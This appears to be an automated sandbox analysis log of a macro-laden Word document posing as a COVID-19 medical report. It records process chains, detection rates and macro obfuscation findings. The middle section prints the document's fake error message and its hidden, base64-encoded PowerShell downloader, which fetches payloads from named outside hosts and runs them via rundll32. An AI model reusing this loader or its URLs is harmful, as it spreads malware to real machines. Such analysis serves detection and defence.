Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............v..j....`Fm...............v.............}..v....xg......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j....0h................v.............}..v.....h......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............v..j....`Fm...............v.............}..v....xo......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j....0p................v.............}..v.....p......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............v..j....`Fm...............v.............}..v....xw......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j....0x................v.............}..v.....x......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0.......................j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v....(.......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....X.......0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......v..j....`Fm...............v.............}..v.... .......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v....X.......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................h.j....E.................v.............}..v............0...............x.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................h.j......Q...............v.............}..v....8.......0...............x.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: IU-8549 Medical report COVID-19.doc Virustotal: Detection: 63%
Source: IU-8549 Medical report COVID-19.doc Metadefender: Detection: 56%
Source: IU-8549 Medical report COVID-19.doc ReversingLabs: Detection: 82%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: IU-8549 Medical report COVID-19.doc Initial sample: OLE summary subject = Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Document contains an embedded VBA with many randomly named variables
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: IU-8549 Medical report COVID-19.doc Stream path 'Macros/VBA/Dulz0g2a3qqdjsty7' : High number of string operations
Source: VBA code instrumentation OLE, VBA macro, High number of string operations: Module Dulz0g2a3qqdjsty7 Name: Dulz0g2a3qqdjsty7
Obfuscated command line found
